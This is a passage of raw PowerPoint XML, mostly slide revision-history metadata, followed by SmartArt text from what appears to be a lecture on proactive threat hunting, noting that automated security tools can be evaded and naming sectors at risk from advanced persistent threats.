            <ac:picMk id="4" creationId="{E482ACF7-A6B4-1AAC-EA59-363C73344280}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:29:33.289" v="13046" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1733743639" sldId="298"/>
            <ac:picMk id="5" creationId="{180BECD4-4384-2430-5677-85FD161FABC0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add del mod">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:29:55.044" v="13061" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="380192578" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:29:51.199" v="13059" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="380192578" sldId="299"/>
            <ac:spMk id="2" creationId="{605AF52F-5A9B-97C8-DBBD-5E3580822E5A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:29:53.646" v="13060" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="380192578" sldId="299"/>
            <ac:picMk id="5" creationId="{E9EBA110-1AD4-2428-9A48-FC18F6DBCBDA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:29:57.355" v="13063" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1410176663" sldId="299"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:36:43.638" v="14277" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2525307627" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:30:14.546" v="13083" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2525307627" sldId="299"/>
            <ac:spMk id="2" creationId="{51851476-6678-CA1F-4A24-21DF257BF107}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:36:43.638" v="14277" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2525307627" sldId="299"/>
            <ac:spMk id="3" creationId="{6B2BBA8B-D3EA-06DE-5B2B-A9808C6C9B23}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:06:52.435" v="16741" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2564313395" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:37:05.991" v="14317" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2564313395" sldId="300"/>
            <ac:spMk id="2" creationId="{75E3FB2D-315F-DA61-F42D-26CEC193F942}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:06:52.435" v="16741" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2564313395" sldId="300"/>
            <ac:spMk id="3" creationId="{0AFC6DC7-CDFA-CFDF-CC7B-814D0BA0787C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:36:53.484" v="14279" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4160686297" sldId="300"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:45:03.011" v="15583" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2191376027" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:39:46.371" v="14670" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2191376027" sldId="301"/>
            <ac:spMk id="2" creationId="{B70FD5F6-C4FC-4574-1E80-95FC24EA7D84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:45:03.011" v="15583" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2191376027" sldId="301"/>
            <ac:spMk id="3" creationId="{681082AB-58EC-8D64-201A-B2A121212491}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:46:31.939" v="15715" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2262696898" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:46:07.040" v="15620" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2262696898" sldId="302"/>
            <ac:spMk id="2" creationId="{58A2EB47-9889-442C-592E-1991B817343D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T04:46:31.939" v="15715" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2262696898" sldId="302"/>
            <ac:spMk id="3" creationId="{08370E8C-A903-1382-1405-205498ED4882}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:01:47.397" v="15880" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1729402679" sldId="303"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:00:54.362" v="15871" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1729402679" sldId="303"/>
            <ac:picMk id="4" creationId="{C06B6BCA-1FD0-C2F7-C6C6-F7E8818EE98D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:01:21.965" v="15873" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1729402679" sldId="303"/>
            <ac:picMk id="2050" creationId="{D0BD3133-B762-1B3B-242F-A082FF9427FF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:01:30.401" v="15876" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1729402679" sldId="303"/>
            <ac:picMk id="2052" creationId="{37B82A4F-D15A-3F6B-FD29-7E8D0CD65C4E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:02:38.018" v="15965"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1453440831" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:02:18.307" v="15963" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453440831" sldId="304"/>
            <ac:spMk id="2" creationId="{23C4A082-7BB0-E658-D7C7-FF201002F3E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:01:51.551" v="15881" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453440831" sldId="304"/>
            <ac:spMk id="3" creationId="{32295B48-3A9C-8DFA-3AAA-81C734319933}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:01:51.893" v="15882"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453440831" sldId="304"/>
            <ac:picMk id="3074" creationId="{2D0487B9-04EA-B04F-F762-04E86D6BBFA8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:45:05.107" v="20913" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="274199429" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:44:16.071" v="20651" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="274199429" sldId="305"/>
            <ac:spMk id="2" creationId="{67FF0E7A-16CD-BF3F-4723-318982129941}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:45:05.107" v="20913" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="274199429" sldId="305"/>
            <ac:spMk id="3" creationId="{615C8DB0-2DE5-0D71-61D4-E6194714FB74}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:32:24.028" v="18612"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1741867208" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:28:05.886" v="18109" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1741867208" sldId="306"/>
            <ac:spMk id="2" creationId="{465E3076-6B05-C868-9BF5-8FD1BB8834FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:23:11.201" v="17460" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1741867208" sldId="306"/>
            <ac:spMk id="3" creationId="{FEB6ED1E-CFC8-8DC9-4C92-1AC3903FC571}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:23:32.934" v="17480" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1741867208" sldId="306"/>
            <ac:spMk id="4" creationId="{C60EE056-D9F3-F668-D66D-DA0BCAA8284D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:32:24.028" v="18612"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1741867208" sldId="306"/>
            <ac:spMk id="6" creationId="{C6B36254-B4D4-0C26-6981-355EFC4BEB7D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:23:16.995" v="17478" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1741867208" sldId="306"/>
            <ac:picMk id="8" creationId="{6F0456AC-B670-3B71-D107-163AAB0817C8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:31:07.325" v="18458" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="935636955" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:30:37.504" v="18412" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="935636955" sldId="307"/>
            <ac:spMk id="2" creationId="{86DD451B-05F3-D1F0-873A-ADD8B6F64BB6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:22:22.349" v="17458"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="935636955" sldId="307"/>
            <ac:spMk id="3" creationId="{5D1EC172-E41F-3EB0-FB24-2168249CD2B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:31:07.325" v="18458" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="935636955" sldId="307"/>
            <ac:spMk id="4" creationId="{36DEAA65-B32A-00C6-9646-6BF01551B07B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:30:50.338" v="18455" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1738863976" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:30:27.277" v="18386" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738863976" sldId="308"/>
            <ac:spMk id="2" creationId="{B349F657-5905-0B17-18B7-22508AA310C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:30:50.338" v="18455" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738863976" sldId="308"/>
            <ac:spMk id="4" creationId="{37AA5790-E512-F656-E5EF-DE7E288928E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:34:10.111" v="18856" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="660653756" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:34:10.111" v="18856" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="660653756" sldId="309"/>
            <ac:spMk id="2" creationId="{6D66BCB4-EFB8-D288-8318-A00A4CAA51EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:31:27.605" v="18531" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="660653756" sldId="309"/>
            <ac:spMk id="3" creationId="{A1E8F687-A13A-6170-F8CC-6AE80E6E9112}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:35:11.511" v="19124" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3220728375" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:33:48.689" v="18852" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3220728375" sldId="310"/>
            <ac:spMk id="2" creationId="{83DB7DD8-7773-C15C-9738-90B26B59E8F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:33:02.069" v="18629" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3220728375" sldId="310"/>
            <ac:spMk id="3" creationId="{BCA8C310-7B44-A7A1-01BE-FC84CBF915BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:35:11.511" v="19124" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3220728375" sldId="310"/>
            <ac:spMk id="4" creationId="{8CF85C6D-C071-A578-30BC-44CB4575C8FC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:35:14.390" v="19125" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4244922623" sldId="311"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:44:07.858" v="20635" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="429843210" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:37:35.767" v="19548" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="429843210" sldId="312"/>
            <ac:spMk id="2" creationId="{FC34A0E3-E6CF-4F02-AEC0-234DAEA2215C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:44:07.858" v="20635" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="429843210" sldId="312"/>
            <ac:spMk id="3" creationId="{01F39C41-D684-F995-192E-B2A860530A3F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Jamie Eccleston" userId="0e64a7d9d99e4e87" providerId="LiveId" clId="{E17EBD52-B5FC-4E5C-BCE3-52FC9E7C31A6}" dt="2025-08-13T05:44:11.418" v="20636" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3165830412" sldId="31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2B0E74-51C6-4840-8ED3-32540962ADE0}"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E3048171-CB2E-4CB6-833F-E8322DCA24C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>Evading automated tools should be considered </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" u="sng"/>
            <a:t>trivial</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2945BB3-98D0-4357-9248-EA3B24363600}" type="parTrans" cxnId="{56A0067E-4D10-4A47-9F8E-3B0282995190}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{499D75CE-B993-4923-9345-8E37F478AB49}" type="sibTrans" cxnId="{56A0067E-4D10-4A47-9F8E-3B0282995190}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C6035B3-74B9-439F-98C1-E1AA0C63098E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>Automated tools are no guarantee an advanced attacker is not in your environment</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BAE1AC0-CB23-4EA6-9E0D-70D9CC1EE693}" type="parTrans" cxnId="{6AE7CBAC-AE00-4D6E-A105-570058167D59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E98C0EE-5AD4-4148-A7F5-2463C2ADC648}" type="sibTrans" cxnId="{6AE7CBAC-AE00-4D6E-A105-570058167D59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E862BD3D-8648-45F5-8D00-5495CE081325}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>Proactive hunting is often done in organisations that are at risk from Advanced Persistent Threats (APTs)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8EBD619-21D4-4C19-8737-F0BCE5E6E082}" type="parTrans" cxnId="{E63F636B-6C4F-4BA8-83BB-96A2F03717C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A812641F-6709-4E35-837D-46DCE10CA114}" type="sibTrans" cxnId="{E63F636B-6C4F-4BA8-83BB-96A2F03717C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B1BB7A5-3C75-4064-9CAC-C278A3539BD7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>E.g. Critical infrastructure (energy, telecommunications), financial services, large and highly profitable organisations (Medibank, Casinos)</a:t>
          </a:r>
